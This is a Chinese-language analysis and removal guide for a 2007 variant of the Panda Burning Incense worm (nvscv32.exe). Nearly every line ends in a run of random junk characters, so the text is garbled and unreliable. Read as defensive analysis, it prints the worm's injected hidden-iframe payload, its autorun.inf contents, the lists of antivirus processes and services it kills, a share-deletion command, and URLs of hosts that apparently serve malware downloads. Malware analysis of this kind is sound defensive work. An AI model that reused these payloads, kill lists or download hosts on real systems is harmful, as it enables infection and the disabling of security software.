熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe )2xE z  
=I2
@/,  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） #~L!pKM  
R (G2qi  
中文名称：（尼姆亚，熊猫烧香） |,b2b2v?  
z~,mR
gc$B  
病毒大小：68,570 字节 ZWO)tVw9G  
)zU:  
编写语言：Borland Delphi 6.0 - 7.0 "e 1wr  
74+A+SK[  
加壳方式：FSG 2.0 -> bart/xt C,/O   
\)OEBN`9#  
发现时间：2007.1.16 Ly;I,)w  
Hou*lCA
  
危害等级：高 IV'p~t
 
w5`#q&?  
一、病毒描述： MaO"#{i  
(&jW}
1D  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 OF[?Z  
l<
(cd,  
二：中毒现象： #)o7"PW:  
Z|G/^DK!
  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 iK#/w1`  
8V9[a*9  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 Oe51PEqn  
C-m*?))go  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 |~WYEh  
t6+YXjXK  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> !^e =P%S  
3GF2eS$$P  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 i
ib  
(luKn&826  
6：不能正常使用任务管理器，SREng.exe等工具。 zvY+R\,in  
 W^Y#pn  
7：无故的向外发包，连接局域网中其他机器。 "X04mQn15  
WNs}sNSf  
三：技术分析 i^)WPP>4Aw  
y500Xs[c  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe  %v+=;jw  
Pao%pA.<  
建立注册表自启动项: &fwS{n;U  
Kc #|Z  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] WkP +r9rT  
pXu/(&?  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 1D F/6y  
#DFV=:|~  
2：查找反病毒窗体病毒结束相关进程: KVPR}qTP;  
fKHE;A*>%  
天网防火墙 ['q&@_d7  
maNW
{"1  
virusscan 2 rN ,D(  
u,1}h L  
symantec antivirus \,&9  
>Kivuc  
system safety monitor ,+`HQdq  
RO&H5m r%@  
system repair engineer nwA8ALhE  
2-'Opu  
wrapped gift killer CSTI?A"P  
At6qtoPRA  
游戏木马检测大师 +9XQ[57  
WGu%7e]  
超级巡警 ka"337H  
80pid[F  
3：结束以下进程: f )Z%pgB  
pZ(Fx&fy  
mcshield.exe 'zZcn" +!  
5D Y
\:AF  
vstskmgr.exe #]]Su91BA  
'?QuJFki  
naprdmgr.exe S'LZk9E  
dRi5hC$  
updaterui.exe | ?yo 3  
3;[DJ5  
tbmon.exe l?8M p$M  
lrWQOYf2  
scan32.exe +7V{ABfGl  
Wg`AZ=t  
ravmond.exe (u3s"I d  
Y&HK1>M_  
ccenter.exe j*v40mXl`2  
ccFn.($p?,  
ravtask.exe 69K{+|  
qZv =  
rav.exe +rXF{@ l  
kq=V4-a[  
ravmon.exe Sh6JF574T  
X-LA}YH=tS  
ravmond.exe `d]IX^;  
+|iYg/2  
ravstub.exe @f+8%I3D  
4mjgt<`  
kvxp.kxp /u%h8!"R  
}[+!$#  
kvmonxp.kxp I` K$E/ns  
%xZG*2vc!B  
kvcenter.kxp '*^yAlgtt  
>LC<O.  
kvsrvxp.exe &,\=3'  
}R[#?ty;]  
kregex.exe mW2,1}Jv  
'_\;jFAM  
uihost.exe ;22l"-F  
eN?Y7  
trojdie.kxp s=6}%%q6  
6VP`evan  
frogagent.exe =L|tp%!  
O,bkQY$v  
kvxp.kxp @`opDu!  
.d;Iht,[  
kvmonxp.kxp 1"7Sy3  
g]c[O*NTL  
kvcenter.kxp :F,O  
<ljI;xE  
kvsrvxp.exe Wz4&7KYY  
7|\@zQ h  
kregex.exe `@d<n  
v2r&('pV  
uihost.exe p.I.iAk%G^  
@vL20O.  
trojdie.kxp {>LIMG-f  
{t"+ 3zy'  
frogagent.exe A[IL H_w  
R[z`:1lo  
logo1_.exe f<=Fsl  
YjF|XPv+ l  
logo_1.exe DFhXx6]  
_lzyMEdr  
rundl132.exe !Fo*e  
iv`O/T  
taskmgr.exe 6qN~/TnHZ  
6u`F d#  
msconfig.exe "mL++>ZSQ  
}i{sg#  
regedit.exe t?o,RN:  
DRqZ,[!+
 
sreng.exe b" xmqWa  
4：禁用下列服务: g%F"l2M  
/>'V!iWyz  
schedule (,^*So/  
{3})=>u:S  
sharedaccess L9pvG(R%  
l4n)#?Q?  
rsccenter qq)0yyL r  
DeR='7n  
rsravmon }:0uo5B7  
*Av"JAX  
rsccenter @(P=Eh  
G?f\>QSZ  
kvwsc Kvsh  
eh1Q7~  
kvsrvxp nJPyM/p  
1qV@qz  
kvwsc H|cNH=  
>!_Xgw  
kvsrvxp 1n%?@+W  
1B),A~Ip  
kavsvc ;8!Z5H  
eh,~^x5  
avp 0]D0{6x8  
UhIDRR  
avp jx acg^c  
BBcV9CGU  
kavsvc q+B&orp  
0$7.g!h?  
mcafeeframework "[}O"LTQ  
.>z][2oz  
mcshield 8M@
BG8  
As+t#
#gN  
mctaskmanager 4&/j|9=X  
"c}@V*cO<d  
mcafeeframework cb5,P~/q  
?g!V!VS2  
mcshield g$. \
  
qj cp65^  
mctaskmanager '!f5?O+E  
iNwqF0  
navapsvc j~j\\Y  
(E]!Z vE  
wscsvc wP"dZagpj  
~b{Gz6u>  
kpfwsvc gm9mg*aM  
r>GZ58i  
sndsrvc xkOpa,=FI  
Scv#zuv_  
ccproxy LJoGpr8  
u&wiGwF[  
ccevtmgr 64:fs?H  
/%lZu^  
ccsetmgr fib}b?vk  
qY 4#V k  
spbbcsvc dg4vc][  
OT'[:|x ;  
symantec core lc };'\~g,1  
PqM1ao
yX  
npfmntor tpuYiL  
ioPUUUb)  
mskservice !bV5Sr^  
h
$L"8#  
firesvc #p[',$cC  
y\{%\$  
5：删除下列注册表项: NH_<q"gT  
{nU=%w"\  
software\microsoft\windows\currentversion\run\ravtask 'mV9{lj7E  
IKie1!ZU{"  
software\microsoft\windows\currentversion\run\kvmonxp 3]?#he  
zSb PW6U  
software\microsoft\windows\currentversion\run\kav soCi[j$lH  
pKi&[  
software\microsoft\windows\currentversion\run\kavpersonal50 y!]CJigpZ  
,]b~t0|B  
software\microsoft\windows\currentversion\run\mcafeeupdaterui }jill+]  
WOh|U4vt  
software\microsoft\windows\currentversion\run\network associates error reporting service ?.Pg\ur  
x`6<m!d`  
software\microsoft\windows\currentversion\run\shstatexe | [>UH  
{&Q9"C  
software\microsoft\windows\currentversion\run\ylive.exe qY[xpm  
KF4PJi;*  
software\microsoft\windows\currentversion\run\yassistse |r bWYl.b  
|^@dFOz  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） 0?>dCu\  
2h%z ("3/  
7：跳过下列目录: ~Ch+5A;
 
-kbg\,PW  
windows r[K5w  
`mN4_\]  
winnt S]E.KLR?[;  
IT$25ZF  
systemvolumeinformation E\C9|1)  
t'ZWc\  
recycled rSrIEP,c'  
U#U]Pt

  
windowsnt MeUaTJFEB  
|2KAo!PI  
windowsupdate zz& ?{vJ  
RVeEkv[qp  
windowsmediaplayer `Qqk<o  
$HJwb-I  
outlookexpress : "1XPr  
IUwm}9Q!  
netmeeting 85GKymz$P  
4Fm90O  
commonfiles H9CS*|q6r  
<ZB1Vi9}8  
complusapplications 7k8pZ  
"Y\_TtY  
commonfiles Q
~T$N  
H#ncM~y*  
messenger :kGU,>BN  
Qf@  
installshieldinstallationinformation o*J3C>  
Xn{1 FJX/  
msn o^ XtU5SVq  
y '!m4-  
microsoftfrontpage %plo=RF  
F;]%V%F.X  
moviemaker {D=@n4JO  
I(XOE$3  
msngaminzone A
F%@VLf  
L`24?Y{  
8：删除*.gho备份文件. ^#sU*trr  
)P+7PhE{J  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. 8-O)Xx}cU  
S9
#)A->  
autorun.inf内容： qT^I?g"!  
uS^Ipxe\  
程序代码 bcYF\@};  
hvaSH69*m  
[AutoRun] ,I,\ml  
p3^m9J  
OPEN=setup.exe B $mX3B
+a  
/Sh#_\x  
shellexecute=setup.exe 1@-Ns  
k`N^Vdr  
shell\Auto\command=setup.exe wH@Ns~[MA  
r3PT1'P?L  
10：删除共享：cmd.exe /c net share admin$ /del /y #Q /Arq  
.p(T^ m2A*  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 q7E~+p(>(  
(I./ Uu%  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 8Q'0h m?  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 ruy}/7uf  
1 9CK+;b  
目前下载列表如下： ^cuc.g)c$?  
qXwPDq/  
http://www.krvkr.com/down/cq.exe {Ja!~N;3  
9_5ow  
http://www.krvkr.com/down/mh.exe ;-qO'V:;  
$\U4hHOo  
http://www.krvkr.com/down/my.exe ~5oPpTAe  
IqoR7ajA  
http://www.krvkr.com/down/wl.exe %xyou:~0zs  
Kh_Lp$'0uM  
http://www.krvkr.com/down/rx.exe uwy:t!(j  
&*aIEa^  
http://www.krvkr.com/down/wow.exe w {3<{  
qO|R^De  
http://www.krvkr.com/down/zt.exe VB*oGG  
&eX!#nQ_.  
http://www.krvkr.com/down/wm.exe s|y "WDyx5  
|0f>aZ  
http://www.krvkr.com/down/dj.exe 7](
KV"%V  
u@cYw:-C  
http://www.krvkr.com/cn/iechajian.exe %Da1(bBh  
XcUwr  
到此病毒行为分析完毕。 ?m\t|/0Q  
bl&nhI)w  
四：Sec120.Com专家解决方案： &n8_0|gK  
@y\XR  
1：关闭网络共享，断开网络。 G\+L~t  

rr02pM0  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） 8p:e##%  
)u`[6,d  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 @X;!92i  
E;R n`oxk  
4：删除注册表启动项 7\s"o&G  
KJaXg;,H  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] 4p,EBn9(  
=E#%'/ A;c  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" %2{%Obp'  
ud'-;W  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe .Z `av n  
1oWED*B  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 GQUe!G9  
U"^kH|  
7：如果电脑上有脚本文件，将病毒代码全部删除。 9 %I?).5  
%|q>pin2  
8：关闭系统的自动播放功能。 ]\hSI){  
[`"ZjkR_J  
这样就基本上将病毒清除了